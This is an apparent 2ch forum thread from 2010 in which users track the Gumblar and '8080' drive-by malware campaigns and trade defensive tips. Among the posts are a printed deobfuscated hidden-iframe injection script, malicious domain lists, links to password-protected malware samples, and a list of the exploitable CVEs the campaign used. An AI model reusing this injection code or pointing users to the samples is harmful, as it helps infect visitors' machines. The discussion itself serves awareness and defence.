「Webを見ただけで感染」という手法であり、あまりそれを信用してもらえず、
セキュリティ各社もあまり報道せず、事態は水面下で流れていきます。
そして、運命の 2009.04.05 PC通販ショップのGENOで感染が確認され、
一度は感染コードの除去が行われたにもかかわらず、
再感染というセンセーショナルな事態を引き起こします。
GENOが感染した際には gumblar.cnではなく、
zlkon.lv(94.247.2.195 as hs.2-195.zlkon.lv)でした。
このときには単純な難読化コードに jQuery.js への誘導コードが記述され、
さらにそこからドライブ・バイ・ダウンロード攻撃のためのリンクに飛ばされました。
GENOが事あるごとに叩かれるのは、
「コンピュータを売ってる店がそんな認識でいいのか?」という部分と
「キャッシュを消せば大丈夫」ってあたり(笑)だとおもいますけど、
同時期に感染した楽天系の2つの店はもっと対応が酷かったことは
あまりしられておらず、
私的には 「GENOウィルス」という呼称は好きではアリマセン。
0512名無しさん@お腹いっぱい。
2010/01/24(日) 09:23:48ここで重要なことは従来言われていた
「怪しいサイトにいかなければ大丈夫」という神話が
崩壊したことです。
普通一般のどこにでもあるサイトが
ある日突然、陥落して毒を吐き出すようになる
というのは想像すらしていなかった
攻撃ベクトルになりました。
その後、94.247.2.195は応答停止となり、
終焉したかにおもわれましたが、
わずかのブランクの後、
初代Gumblar(Gumblar/Martuz)として凱旋してきました。
このとき、初めて事態の深刻さがわかりました。
初期の zlkon の攻撃時に「インストール」されていたマルウェアは
潜伏中に感染ノードからありとあらゆる情報を盗み、
一番有効な撹拌手段として、
FTPアカウントを盗んでサイトを改ざんし、
さらに感染者を増やすというねずみ講的手法に転じたのです。
しかも、このねずみ講には、大きな違いがありました。
zlkon.lv時代になかった
「感染しない環境には普通のコードを返す」という
逆発想的rootkit手法を導入したのです。
更にはIP制限により、一度マルウェアをダウンロードした相手には
一定期間配布しないという「ケチ政策」も施行されました。
0513名無しさん@お腹いっぱい。
2010/01/24(日) 09:26:13これにより、感染する可能性の低い環境には何も起きず、
脆弱性のある環境への「無差別ターゲット型」攻撃という
言語的にもにアリエナイ攻撃手法が確立しました。
この手法により脆弱性を放置していた環境にのみ爆発的に広まり、
かつ、普通にセキュリティ意識の高いユーザは何が起きているのかわからず、
セキュリティ会社は検体を取得できないという、
きわめて皮肉な結果が更なるパンデミックを引き起こしたのです。
しかも、この勤勉なマルウェア作者はほとんど毎日のように、
javascriptコード、マルウェア本体の更新を行い、
セキュ会社とのイタチゴッコなせめぎ合いの主導権を握り続けました。
このとき、悔やまれることは zlkon.lvのテイクダウンの際に、
(ITパスポートのCMをうつ金があるなら)
きちんとした対応策を
IPAあたりが音頭を取って報道等で告知していれば、
こんな事態になることはなかったのではないか?と思われることです。
しかし、まだこのときは救いがありました。
gumblar.cnもmartuz.cnも、単独のIPであり、
極端なことを言えばたった3つのIPを塞いでしまえば、
この攻撃は無効化されたのです。
そして、このことをいまだに引きずって
「危険なIP/TLDを塞げば大丈夫」という
幻想を生む皮肉な結果になりました。
0514名無しさん@お腹いっぱい。
2010/01/24(日) 09:29:04一方、攻撃手法として確立してしまった
ドライブ・バイ・ダウンロードは、
ますます嫌な進化を続け、
8080ポートへのリバースプロキシを悪用した攻撃が
水面下で進行していました。
この攻撃は、細かいスパンで切り替わる
5基のラウンドロビンを使った大量のドメイン投入で、
名称がつけられないまま 8080(仮)として、
延々とラウンドロビンを差し替えながら
感染ノードを増やしていました。
やがて、この 8080系も姿を消したかに見えた矢先の
2009年11月、
ScanSafeとKasperskyが突然アラートを発し、
「Gumblar復活」の烽火を上げたのです。
この新しいGumblar(Gumblar.X)は、
以前の gumblarよりも更に洗練された攻撃で、
その恐ろしく緻密に計算された陥落サイト群のヒエラルキー構成により、
幾つものBOTが、複数の役目を絡み合いながら機能する、
超並列Botサーバとなっていました。
しかし、この攻撃に使用されていた脆弱性は、
既に塞がれていたものばかりで、
これまで散々脅されていたユーザは
きちんと Adobe系の穴を塞いでいたため、
それほど深刻な事態にはなりませんでした。
0515名無しさん@お腹いっぱい。
2010/01/24(日) 09:31:44ところが、その背後で 8080系が古くい癖に極めて有効な
Java JREの脆弱性を取り入れ、
一気に感染ノードを広げにかかりました。
これは、日本において
メーカ販売のPCに「プリインストール」されており、
かつ自動更新の手続きがとられていないものが多いため、
一気に日本で拡散する原因となりました。
また、マルウェア誘導コードに有名な日本のドメインが
サブドメイン名やフォルダ名に羅列され、
ホワイトリストと単純なORチェックを行っている
IDSではスルーされてしまうという
悲惨な状況も確認されています。
しかも悪いことに
12月初旬に Adobe Readerの脆弱性が公表、
PoCが公開されたにもかかわらず
あー長かった。
というわけで、
もしウチ的に "Gumblar"って何?と応えるとするなら
「いやなもの」
ということでどうでしょう(殴)
UnderForge of Lack ≫ Blog Archive ≫ 2010.01.23 土曜日
http://www3.atword.jp/gnome/2010/01/23/jan-23-2010-sat/
0516名無しさん@お腹いっぱい。
2010/01/24(日) 09:32:350517名無しさん@お腹いっぱい。
2010/01/24(日) 09:43:330518名無しさん@お腹いっぱい。
2010/01/24(日) 09:54:08単なるこれ見よがしな知識披露目的のオナニー記事だな。
0519名無しさん@お腹いっぱい。
2010/01/24(日) 09:59:260520名無しさん@お腹いっぱい。
2010/01/24(日) 10:04:24自演乙
0521名無しさん@お腹いっぱい。
2010/01/24(日) 10:13:30ブログ主さん乙
とでも返されればご満足ですか?
0522名無しさん@お腹いっぱい。
2010/01/24(日) 10:14:13サイトの機密情報を盗みたかったの?
0523名無しさん@お腹いっぱい。
2010/01/24(日) 10:15:250524名無しさん@お腹いっぱい。
2010/01/24(日) 10:17:29なにこれ、頭にくる文章だな…
0525名無しさん@お腹いっぱい。
2010/01/24(日) 10:22:01これを例のSQLインジェクション野郎に読ませるべき
0526名無しさん@お腹いっぱい。
2010/01/24(日) 10:23:470527名無しさん@お腹いっぱい。
2010/01/24(日) 10:31:12オナニープレイかよ死ね
0528名無しさん@お腹いっぱい。
2010/01/24(日) 10:33:510529名無しさん@お腹いっぱい。
2010/01/24(日) 10:59:360530名無しさん@お腹いっぱい。
2010/01/24(日) 11:18:10違うよ。
0531名無しさん@お腹いっぱい。
2010/01/24(日) 11:27:42そもそも解析結果を理解できてるとは思えないんですけど
だめじゃん
0532名無しさん@お腹いっぱい。
2010/01/24(日) 11:28:20いっそのこと「最初からSQL云々なんて書いてない!ガンブラにやられて改ざんされたっ、
悔しいビクンビクン!、このように完璧の防御を誇るITProの高性能サーバまでハッキングする
恐ろしいウィルスなのであ〜る!」とか書いとけばいいのに。
.ru:8080コレクション
ampsguide anycitytown authentictype burkewebservices carswebnet easylifedirect
freeprosports funwebmail guidebat genuinehollywood genuinecolors
halfsite homeproair homesaleplus lagworld saletradeonline suesite sugaryhome
superaguide superpropicks theatticsale theaworld thechocolateweb
thelaceweb themobilewindow themobisite viewhomesale webdesktopnet
webdirectbroker webnetenglish webnetloans webnetenglish whosaleonline
worldsouth worldwebworld yourtruemate
きりがないなw 俺も8080ポートをアク禁するだけにしようかな
0533名無しさん@お腹いっぱい。
2010/01/24(日) 11:45:18むしろ、80と443のみ許可で
0534名無しさん@お腹いっぱい。
2010/01/24(日) 12:04:00そこに書いてあるアドレスに書いてあるの?
無関係?
知らないアドレスは踏みたくないんだけど続きがあるなら見たい。
0535名無しさん@お腹いっぱい。
2010/01/24(日) 12:17:210536名無しさん@お腹いっぱい。
2010/01/24(日) 12:19:59ここをFirefoxのview-sourceで表示して、それを、ファイル>名前を付けてページを保存>
ファイルの種類は「Web ページ、HTML のみ」で保存してvirustotalすると
結果: 10/41 (24.4%)になるのだが、俺はhtmlとかにあまり詳しくないので
単純にIframeに反応した誤検出なのかどうかが良く分からない
ttp://www.virustotal.com/jp/analisis/592e666dd50c92ea7fe7c24af8d77b284d49d91c008675001e332a7945652c6f-1264302239
0537名無しさん@お腹いっぱい。
2010/01/24(日) 12:29:15GumblarChecker 2にかけたら、avastがプァーン
HTML:IFrame-GC [Trj]
0538名無しさん@お腹いっぱい。
2010/01/24(日) 12:50:15<iframe name=c10 src='p://●net/.go/check.html' width=262 height=196 style='visibility:hidden'></iframe>
アスキーコード埋め込みでそのあとurlエンコードしたら上記が出てきた
誤検知っぽい
0539名無しさん@お腹いっぱい。
2010/01/24(日) 12:59:20すまん、ドメイン検索するとウイルス配布サイトらしいな
gogo2me●net
0541名無しさん@お腹いっぱい。
2010/01/24(日) 13:58:42所詮、トレンドマイクロの社員はこの程度ですから・・・
0542名無しさん@お腹いっぱい。
2010/01/24(日) 14:02:48感染後に予防しても意味ないわ
風邪ひいた後にみかん食ったって治らないだろ
0543名無しさん@お腹いっぱい。
2010/01/24(日) 14:29:13インフルエンザの時もマスクしてたのは最初だけだったし^^;
まっ基本的(手洗いうがい=最新のパッチ)なことは気にするようになったんじゃないの
無神経な奴は、何があったも気にしないから無理かも^^;
0544名無しさん@お腹いっぱい。
2010/01/24(日) 14:32:49サクサク軽快〜♪ サクサク軽快〜♪ ウイルスバスター!!
販売本数No.1!! 選んだ貴方は・・・
パソコン\(^o^)/オワタ
0545名無しさん@お腹いっぱい。
2010/01/24(日) 15:02:560546名無しさん@お腹いっぱい。
2010/01/24(日) 15:18:26ttp://bcnranking.jp/category/subcategory_0019_month.html
0547名無しさん@お腹いっぱい。
2010/01/24(日) 15:59:45これはタダならまあいいよね
カスペノートンアバストfセキュレ色々入れてウイルスかかったことなんかないからわからんけど
0548名無しさん@お腹いっぱい。
2010/01/24(日) 16:07:00www●kidsparlour●net/
まだ対処してませんね
0549名無しさん@お腹いっぱい。
2010/01/24(日) 16:15:000550名無しさん@お腹いっぱい。
2010/01/24(日) 16:15:590551名無しさん@お腹いっぱい。
2010/01/24(日) 16:26:33こんなとこもまだ
0552名無しさん@お腹いっぱい。
2010/01/24(日) 16:33:43www●deeplove2●com/index_2.html
ttp://www.dotup.org/uploda/www.dotup.org589508.7z.html
新種っぽいの
ttp://www.dotup.org/uploda/www.dotup.org589537.7z.html
本体
virus
解析して難読化解除・コメント追加したもの
メールの内容を盗んだり色々してるね
0556名無しさん@お腹いっぱい。
2010/01/24(日) 18:38:15だけど553と554のファイル内容一緒だ
あら・・本当だスマン
554はこれね ttp://www.dotup.org/uploda/www.dotup.org589804.txt.html
555にWinampの〜て書いてあるけどあれは間違えてた、正しくはDirectShowの脆弱性を使うものだ
0558名無しさん@お腹いっぱい。
2010/01/24(日) 19:34:03まあ見てもわけわからんのですが、一般人は現状の対策でおkってことでいいの?
0559名無しさん@お腹いっぱい。
2010/01/24(日) 19:38:550560名無しさん@お腹いっぱい。
2010/01/24(日) 19:40:54・古いIEだとヤヴァイ、ネット上にある任意のexeファイルを実行可能
・IEはActiveXを実行しないようにしたらすべて回避可能
([インターネットオプション]から[セキュリティ]タブの[インターネット]ゾーンのセキュリティレベルを[高]にするだけ)
・IE以外はJavaを切れば回避可能
・Flashは使われてない
0561名無しさん@お腹いっぱい。
2010/01/24(日) 19:48:08今回偶然使ってなかっただけだろうから
例えば他スレで使ってないと断言するのは危ないよ
0562名無しさん@お腹いっぱい。
2010/01/24(日) 19:53:430563名無しさん@お腹いっぱい。
2010/01/24(日) 19:54:20”IEは使わない方が良い”
コードの9割がActiveX依存、ActiveXを除けば残るのはJavaのみ
0564名無しさん@お腹いっぱい。
2010/01/24(日) 19:56:54俺も読んでも分からない人なのだけど
> ・古いIEだとヤヴァイ
古いってIE6とかのバージョンっていう意味?
IE6はまだサポート期間内だからパッチが提供されてるのでアップデートをきちんとしていれば大丈夫、してないなら危険
IE5.5以前は危険
0566名無しさん@お腹いっぱい。
2010/01/24(日) 20:03:56了解。回答ありがとう
0567名無しさん@お腹いっぱい。
2010/01/24(日) 20:37:13よく分からないんだが、
ここ開こうとしたらNODに止められたんだけど、
ガンブラー感染してるって事?
0568名無しさん@お腹いっぱい。
2010/01/24(日) 20:40:46感染してる
0569名無しさん@お腹いっぱい。
2010/01/24(日) 20:48:30そうなんだ。ガンブラー怖いな・・
回答thx
0570sage ◆sage/xLnlI
2010/01/24(日) 20:49:28こんどはどんなページに汁かな・・・
もちろん踏ませるのではなく本体を拾ったりしてもらうためにやっているのです
http://www16。atpages。jp/filedl
ガンブラー置き場
たぶんこのアドレスまで安全、進むと危険
0571sage ◆sage/xLnlI
2010/01/24(日) 20:53:180572名無しさん@お腹いっぱい。
2010/01/24(日) 21:21:03これはGumblar・・・じゃないか
0573472
2010/01/24(日) 21:26:11そうスか…テンプレの対策はしてるけど、IEはなんかもう
使う気しなくなってもうた。「〜感染してみた」
の記事じっくり読んできたけどIE6がヤバイんですね。
Firefox+NoScriptでも迂闊に許可できないなぁと
0574名無しさん@お腹いっぱい。
2010/01/24(日) 21:33:25下のwhoisにめるぽ
上のwhoisは戻ってきちゃった。。
>>551
さくらにつーほー済み>>492
>>552
whoisからめる
0575名無しさん@お腹いっぱい。
2010/01/24(日) 21:49:15嫌になってmacmini買った
macだから安全ってことはないんだけどね
0576名無しさん@お腹いっぱい。
2010/01/24(日) 22:10:52whoisからめる
0577名無しさん@お腹いっぱい。
2010/01/24(日) 22:13:19Trojan:JS/Agent.FAタイプのGumblarは知らないなあ
0578名無しさん@お腹いっぱい。
2010/01/24(日) 22:13:59乙です
0579名無しさん@お腹いっぱい。
2010/01/24(日) 22:28:138にバージョンアップしない自分が悪い
0580名無しさん@お腹いっぱい。
2010/01/24(日) 22:29:07NODが反応
JS/TrojanDownloader.Agent.NRL
0581名無しさん@お腹いっぱい。
2010/01/24(日) 22:37:31trueworldmedia●ru
0582名無しさん@お腹いっぱい。
2010/01/24(日) 22:41:15581は /*Exception*/
0583名無しさん@お腹いっぱい。
2010/01/24(日) 22:42:472kの俺はどうなる
変えたくても変えられないんだぞ
0584名無しさん@お腹いっぱい。
2010/01/24(日) 22:51:32IE6の使用は本当にIEじゃないと駄目なページにとどめるようにすればいい。
0585名無しさん@お腹いっぱい。
2010/01/24(日) 22:59:08whoisからめる
0586名無しさん@お腹いっぱい。
2010/01/24(日) 23:00:44DEPが使えないのが痛すぎ・・・
0587名無しさん@お腹いっぱい。
2010/01/24(日) 23:05:54psk3●sakura●ne●jp/iv35/
Exception
trueworldmedia●ru
dp44016550●lolipop●jp/seikatuhogo/
Exception
cometruestar●ru
0588名無しさん@お腹いっぱい。
2010/01/24(日) 23:06:160589名無しさん@お腹いっぱい。
2010/01/24(日) 23:08:332K使ってて感染した人にはセキュリティソフト関係なしに自己責任だろう
XPやVISTA、7にバージョンアップしない自分が悪い
0590名無しさん@お腹いっぱい。
2010/01/24(日) 23:09:57理由を聞くとセキュリティの都合で〜とか言う。
0591名無しさん@お腹いっぱい。
2010/01/24(日) 23:10:40普段使いは火狐だから大丈夫だと思ってたら、appleのソフトはバージョンアップ時に
強制的にIE立ち上げやがったぞ。
「IEは普段使いじゃないけど普段使いにする?」の画面が出てきて、止められなかった。
appleはIEでも火狐でも許可サイトには入れてなかったのに。
ここから本題。
慌ててIEは最高レベルにしたけど、立ち上げた瞬間に突く脆弱性って、コード実行能力
皆無のIEでもやられる?それとも大丈夫?
これが大丈夫でないなら、IEが完全削除できないWINでは、ゼロデイ突かれたら
終わりってことになる。
0592名無しさん@お腹いっぱい。
2010/01/24(日) 23:19:00whoisからめる
0593名無しさん@お腹いっぱい。
2010/01/24(日) 23:20:510594名無しさん@お腹いっぱい。
2010/01/24(日) 23:26:10うちも2kだけど、2k用のIE6の修正パッチがms updateで配布されてるぞ適応したら?
0595名無しさん@お腹いっぱい。
2010/01/24(日) 23:35:29砂糖を煮詰めたお菓子だよ
0596名無しさん@お腹いっぱい。
2010/01/24(日) 23:36:410597名無しさん@お腹いっぱい。
2010/01/24(日) 23:38:032000でIE6でも22日のパッチを当てておけば現状ゼロディなんてないだろ。
Silverlightは2000だとWindows Updateには来ないみたいだからSilverlight公式に行かないと
アップデートできないけど。
というかさ、立ち上げた瞬間に突かれる脆弱性って具体的には何よ?
そんなもの見たことも聞いたこともないんだけど。
>>593
プリンの底にある黒い奴のこと。
0598名無しさん@お腹いっぱい。
2010/01/24(日) 23:45:49PASS:virus
やあ (´・ω・`) 久しぶりに本体まとめを更新してみた
ブランクがあるので取りこぼしがあるだろう・・・
もう疲れたよ、パトラッシュ・・・
0599名無しさん@お腹いっぱい。
2010/01/24(日) 23:53:53乙です
ダウン開始直後いきなり反応して接続切られた・・・
0600名無しさん@お腹いっぱい。
2010/01/24(日) 23:55:430601名無しさん@お腹いっぱい。
2010/01/24(日) 23:58:55PASS:virus
パスワードつけてなかった・・・orz
0602名無しさん@お腹いっぱい。
2010/01/25(月) 00:00:25テッちゃんのお友達の二人組
0603名無しさん@お腹いっぱい。
2010/01/25(月) 00:05:090604名無しさん@お腹いっぱい。
2010/01/25(月) 00:06:12さくら
ろりぽ
でじろにめる逝かなかったみたい…
0605名無しさん@お腹いっぱい。
2010/01/25(月) 00:06:220606名無しさん@お腹いっぱい。
2010/01/25(月) 00:08:07大丈夫
プニルの開発もIEは最新にしてくれってアナウンスしてた
0607名無しさん@お腹いっぱい。
2010/01/25(月) 00:12:08それならよかった
今IE6から8にアップデートしたとこだ
そしたらjavaがねぇぞゴルァって言われた
0608名無しさん@お腹いっぱい。
2010/01/25(月) 00:13:50感染はしたことない
スクリプトは切ってる
0609名無しさん@お腹いっぱい。
2010/01/25(月) 00:20:360610名無しさん@お腹いっぱい。
2010/01/25(月) 00:24:33ルーターがなかったらやられるんじゃないの、立ち上げた瞬間に。
0611名無しさん@お腹いっぱい。
2010/01/25(月) 00:27:20スクリプトは切っておいたほうがいい?
0612名無しさん@お腹いっぱい。
2010/01/25(月) 00:29:41自分は切ってるよ
絵茶の時は絵茶専用に別のブラウザ立ち上げてる
0613名無しさん@お腹いっぱい。
2010/01/25(月) 00:31:540614名無しさん@お腹いっぱい。
2010/01/25(月) 00:39:460615名無しさん@お腹いっぱい。
2010/01/25(月) 00:41:14なるほど、ルーターなしの環境なあ。それは想定していなかったわ。
0616名無しさん@お腹いっぱい。
2010/01/25(月) 00:44:280617名無しさん@お腹いっぱい。
2010/01/25(月) 00:44:390618名無しさん@お腹いっぱい。
2010/01/25(月) 00:44:53信頼してるサイトが感染したらと思うと背筋が寒いぜ
0619名無しさん@お腹いっぱい。
2010/01/25(月) 00:45:44改竄されたら!
0620名無しさん@お腹いっぱい。
2010/01/25(月) 00:47:08改竄されたら!
0621名無しさん@お腹いっぱい。
2010/01/25(月) 00:49:54ハンゲー公式が!
官公庁のサイトが!
きりがないな
0622名無しさん@お腹いっぱい。
2010/01/25(月) 00:52:070623名無しさん@お腹いっぱい。
2010/01/25(月) 00:53:08ウイルス仕込まれたりデータごっそり流出?
0624名無しさん@お腹いっぱい。
2010/01/25(月) 00:53:48ネトゲの公式はどっかやられたことあったよ
0625名無しさん@お腹いっぱい。
2010/01/25(月) 01:00:36Gumblar、8080とはちと違う話だが
ttp://trendy.nikkeibp.co.jp/article/col/20050510/112145/
0626名無しさん@お腹いっぱい。
2010/01/25(月) 01:02:270627名無しさん@お腹いっぱい。
2010/01/25(月) 01:12:430628名無しさん@お腹いっぱい。
2010/01/25(月) 01:13:370629名無しさん@お腹いっぱい。
2010/01/25(月) 01:13:500630名無しさん@お腹いっぱい。
2010/01/25(月) 01:14:06企業ではIE6のところが多いんじゃないかな。
とくに自社開発システムを使う大企業。
IE6はセキュリティの関係で使わざる得ない。7以上にするとセキュリティが高すぎて
業務システムが動かない。
0631名無しさん@お腹いっぱい。
2010/01/25(月) 01:17:09JREって保護モード対応してるから、Vista/7でIEを保護モード下で動かしてると、
JREの脆弱性を突かれてもシステムには影響ないんだよな
JREバグの検証コードで実験したけど、保護モードで動かしたときは大丈夫だった
0632名無しさん@お腹いっぱい。
2010/01/25(月) 01:21:02不具合の出る特定ソフトは
DEPの例外に登録すればいい気がするが・・・?
0633名無しさん@お腹いっぱい。
2010/01/25(月) 01:24:55普及率が高いものはターゲットになるから、普及率がひくけりゃ低いほど狙われにくい
だから、NetBSDとかOpenBSDとかだれも使ってないOSが安全
0634名無しさん@お腹いっぱい。
2010/01/25(月) 01:28:16おれは設定変更してすべてのプログラムで有効にしてる
0635名無しさん@お腹いっぱい。
2010/01/25(月) 01:29:50きちんとアップデートしておけば発動することはないんだから有効のままでいい。
たとえ発動しなくても引っかかること自体が嫌なら無効にすればいい。
0636名無しさん@お腹いっぱい。
2010/01/25(月) 01:30:20ユーザーは穴開けまくる
0637名無しさん@お腹いっぱい。
2010/01/25(月) 01:38:18乙!
> Outlook Expressのメールすべてを…url…に送信する
そこんとこは「CVE-2008-2463」だお
SnapShot Viewerの SnapshotPath と CompressedPath と PrintSnapshotを
ごにょごにょすると、…url…が実行できちゃうみたいね
ついでだから感染したい人向けの環境書いとくよ
・MDAC(CVE-2006-0003)
SP3より前のWindows XPで2006年4月の月例パッチを未適用に
・SnapShot Viewer(CVE-2008-2463)
2008年8月の月例パッチ未適用の古いSnapShot Viewerをインストール
・Microsoft Video ActiveX Control(CVE-2008-0015)
2009年7月のパッチ未適用のDirectShow(Windows)をインストール(デフォルト入ってる?)
・Adobe Reader
8.1.2以下のVer.8→util.printf(CVE2008-2992)コース
9.2.0にしる→newPlayer(CVE-2009-4324)コース
7.1.0より前のVer.7→Collab.collectEmailInfo(CVE-2007-5659)コース
Acrobat Script(ReaderのJavaScriptな)でバージョン分けしてるから、
この3パターンのどれかしかだめだお
・JRE(CVE-2008-5353)
6 Update 11より前、5.0 Update 17より前 、1.4.2_19より前のJREのどれか
DEPの有効化やスクリプト無効化は禁止ね
うまく組み合わせないと好みの攻撃が受けられないから注意してね
感染チャンスは1日1回、IP変えないとはじかれちゃうぞ
ほかに足りないものある > all
0638名無しさん@お腹いっぱい。
2010/01/25(月) 01:42:220639名無しさん@お腹いっぱい。
2010/01/25(月) 02:10:390640名無しさん@お腹いっぱい。
2010/01/25(月) 02:29:43GENOの時には官公庁かなりやられたよ。
ライブカメラ持ちの国交省出先のは、一ヶ月前に見てたからぞっとした。
8080になってからはどうだったか忘れた。
0641名無しさん@お腹いっぱい。
2010/01/25(月) 02:56:20恐らく日本語サイトでは1日あたりのページビューが最も多いページ。
あそこがやられると、被害は「甚大」の一言で言い表せるものではなくなるだろう。
Yahoo! JAPANのセキュ担当、頼んだぞ!
0642名無しさん@お腹いっぱい。
2010/01/25(月) 03:05:010643名無しさん@お腹いっぱい。
2010/01/25(月) 03:10:160644名無しさん@お腹いっぱい。
2010/01/25(月) 03:14:02気持ち悪(´・∀・`)
MじゃなくてGだね(^Д^)
0645名無しさん@お腹いっぱい。
2010/01/25(月) 03:14:05O1waipyz = document.createElement('if'+'rame');
O1waipyz.style.visibility = 'h!(#i^?d^@@d^^&e&^((n&)#'.replace(/\(|\$|#|&|@|\^|\)|\!/ig, '');
O1waipyz.src = 'http://'+W7cw9590+':8080/index.php?sc';
document.body.appendChild(O1waipyz);
0646名無しさん@お腹いっぱい。
2010/01/25(月) 03:15:020647名無しさん@お腹いっぱい。
2010/01/25(月) 03:31:510648名無しさん@お腹いっぱい。
2010/01/25(月) 03:33:23/ ̄ ̄ ̄ ̄\
/ \
/\ \ / |
||||||| (・) (・) |
(6-------◯⌒つ | < バカモ〜ン! また直リンしおって!
| _||||||||| |
\ / \_/ /
\____/
0649名無しさん@お腹いっぱい。
2010/01/25(月) 03:44:480650名無しさん@お腹いっぱい。
2010/01/25(月) 04:29:46http://anchorage.2ch.net/test/read.cgi/bizplus/1264115360/
0651650
2010/01/25(月) 04:31:210652名無しさん@お腹いっぱい。
2010/01/25(月) 05:59:46一気にどこかを攻撃
0653名無しさん@お腹いっぱい。
2010/01/25(月) 06:25:190654名無しさん@お腹いっぱい。
2010/01/25(月) 06:32:100655名無しさん@お腹いっぱい。
2010/01/25(月) 06:39:260656名無しさん@お腹いっぱい。
2010/01/25(月) 06:54:360657名無しさん@お腹いっぱい。
2010/01/25(月) 06:59:420658名無しさん@お腹いっぱい。
2010/01/25(月) 09:00:520659名無しさん@お腹いっぱい。
2010/01/25(月) 09:29:38「コントロールパネル」 -> 「管理ツール」 -> 「サービス」 -> 「Remote Procedure Call」を選択する。
「Remote Procedure Call (RPC) エンド ポイント マッパーや各種の RPC サービスを提供します。」
スタートアップの種類が、自動のまま動かせないのですが。
その下のRemote Procedure Call(RPC)Locatorは変えられます。
こちらを切っておけばよいのでしょうか?
0660名無しさん@お腹いっぱい。
2010/01/25(月) 09:30:290661名無しさん@お腹いっぱい。
2010/01/25(月) 11:16:50ここみたらRemote Procedure Callは絶対に自動ってあるけど
Remote Procedure Call(RPC)Locatorは手動ってあるし・・・
どうしよう
0662名無しさん@お腹いっぱい。
2010/01/25(月) 11:26:07そんな"セキュリティにこだわった"環境で、"ネットサーフィン"すんなよ、って話。
0663名無しさん@お腹いっぱい。
2010/01/25(月) 12:47:34スクリプトが直接悪さをしてるわけではないから、基本的な対策はしたうえで
火狐+RequestPolicy(アドオン)でスクリプト有効にして問題ないっぽい。
例えば581は以下のようになる(スクリプトON、RequestPolicy+Flashblock)
ttp://www.dotup.org/uploda/www.dotup.org592430.jpg.html
自分で許可したりホワイトリストに入ってなければ、大元のサイト以外へのアクセスはブロックされる。
で、画像のログの下から2番目のアクセス先があれなわけだw 長文失礼!
0664名無しさん@お腹いっぱい。
2010/01/25(月) 12:50:24ttp://www.dotup.org/uploda/www.dotup.org592437.jpg.html
0665名無しさん@お腹いっぱい。
2010/01/25(月) 13:01:03管理人にメール出した後も変化無しだったんで,
今朝AAA!CAFEに連絡したら,やっと改竄箇所が削除されてました。
トップページで告知してくれたらいいんだけど。
0666名無しさん@お腹いっぱい。
2010/01/25(月) 13:03:13連絡してやったら、Web製作費がリーズナブルだったから発注したそうだ
「お知らせ下さってありがとうございます お礼に家具をお安くいたします」とのことだったw
0667名無しさん@お腹いっぱい。
2010/01/25(月) 13:09:51やたら、TM6.tmpだの、TM1A.tmpだの
通信をしたいとFWのポップアップがでるから
おかしいと思ってたら・・・。
TM6.tmp類の削除とレジストリからも消したのだが、
siszyd32.exeが見つからない。
と思ってたら、wwwpos32.exe でした。
FFFTPに何個か設定があったのですが、
今のところWebの改竄は確認できてません。、
TM6.tmpの通信をブロックしてたので、
情報は漏れなかったのかも?
0668名無しさん@お腹いっぱい。
2010/01/25(月) 13:17:26htmlだけ見てたらjsやられてたとか単純に後回しにされてるとか。
0669名無しさん@お腹いっぱい。
2010/01/25(月) 13:49:48>>661
素人はRPCを絶対いじるな
ttp://blog.goo.ne.jp/rimotyu/e/4572b0958f2f6881a01be32de9d01ebd
http://soudan1.biglobe.ne.jp/qa3068747.html
ttp://weblabo.griffonworks.net/dorlog/2nddorcom/windows/26028.html
0670名無しさん@お腹いっぱい。
2010/01/25(月) 14:12:21いまは感染サイトは閉鎖されて、ブログ書き変わっているんだけど、
> 現在、
> 「カーポスト」「横浜陸事の代書屋」のホームページを
> 閉鎖しております。
> また、対策方法として下記の手続きを施します。
> 当事務所ホームページにより感染してしまわれた方には
> 大変ご迷惑をおかけいたしまして誠に申し訳ございません。
> FTPソフトを利用なさらない方には実害はないかも
> しれませんが、対応方法等を記載致します。
実害ないんだっけ???
0671名無しさん@お腹いっぱい。
2010/01/25(月) 14:12:45基本的な対策をしていればRequestPolicyなんて不要だろ。
そもそもログが不要ならRequestPolicyと同じことはFirefoxの本体機能だけで可能。
0672名無しさん@お腹いっぱい。
2010/01/25(月) 14:16:16マジで。今日いじったばっかりだったよ。
素人判断で迂闊に手出しちゃ駄目だなぁ。
0673名無しさん@お腹いっぱい。
2010/01/25(月) 14:19:58よかったねぇ、先に戻し方がわかって。
0674名無しさん@お腹いっぱい。
2010/01/25(月) 14:31:44それにもっさり重くなるし
0675名無しさん@お腹いっぱい。
2010/01/25(月) 14:36:57再起動後に症状が出るはずだから、今のうちに必要な部分はテキスト保存しておけ
セキュリティソフトも立ちあがれなくなり、最悪ネットに接続することすらやばくなる
>>7コピペは次スレからどう扱うべきかね
0676名無しさん@お腹いっぱい。
2010/01/25(月) 14:49:11とかテンプレの頭とケツに行間空けて書いておくとか
0677名無しさん@お腹いっぱい。
2010/01/25(月) 14:54:43> 293 :名無しさん@お腹いっぱい。:2010/01/22(金) 02:08:43
> 手持ちの*.ru:8080な奴をISPとGoogleさんちのDNSで試したけど
> 全部IPが引けなくなってしまった
GNU GLP/LGPLのドメインが一掃されたみたいだから
21日までビンゴ、22日から実害なし…かな
0678名無しさん@お腹いっぱい。
2010/01/25(月) 15:18:53>>7 は統合セキュリティソフトやFirewallで閉じてるだろうから「いらない」に一票
正直セキュリティソフトも入れてないやつまで面倒見切れん
0679名無しさん@お腹いっぱい。
2010/01/25(月) 15:30:28誰か確認して〜。
124 名前:Trackback(774)[] 投稿日:2010/01/25(月) 14:14:53 ID:Klq45gB4
サイトがトロイの木馬に感染してる?
125 名前:Trackback(774)[] 投稿日:2010/01/25(月) 14:41:52 ID:ABVnF2MI
カスペル兄貴に怒られたよ
http://pc11.2ch.net/test/read.cgi/blog/1161013763/124-
0680名無しさん@お腹いっぱい。
2010/01/25(月) 15:34:18チェッカーじゃかからんがaguseでいったらTrojan.JS.Redirector.arだとさ
0681名無しさん@お腹いっぱい。
2010/01/25(月) 15:34:49Trojan.JS.Redirector.arって出るんだが
これカスペの誤検出なのかな?
0682名無しさん@お腹いっぱい。
2010/01/25(月) 15:35:140683名無しさん@お腹いっぱい。
2010/01/25(月) 15:37:28のサイト踏んじゃったんだけど…
オンラインスキャンで反応でなければセーフでしょうか
0684名無しさん@お腹いっぱい。
2010/01/25(月) 15:41:430685名無しさん@お腹いっぱい。
2010/01/25(月) 15:42:250686名無しさん@お腹いっぱい。
2010/01/25(月) 15:42:490687名無しさん@お腹いっぱい。
2010/01/25(月) 15:43:390688名無しさん@お腹いっぱい。
2010/01/25(月) 15:44:47aguseでいくとでるね
これなんだろう
0689名無しさん@お腹いっぱい。
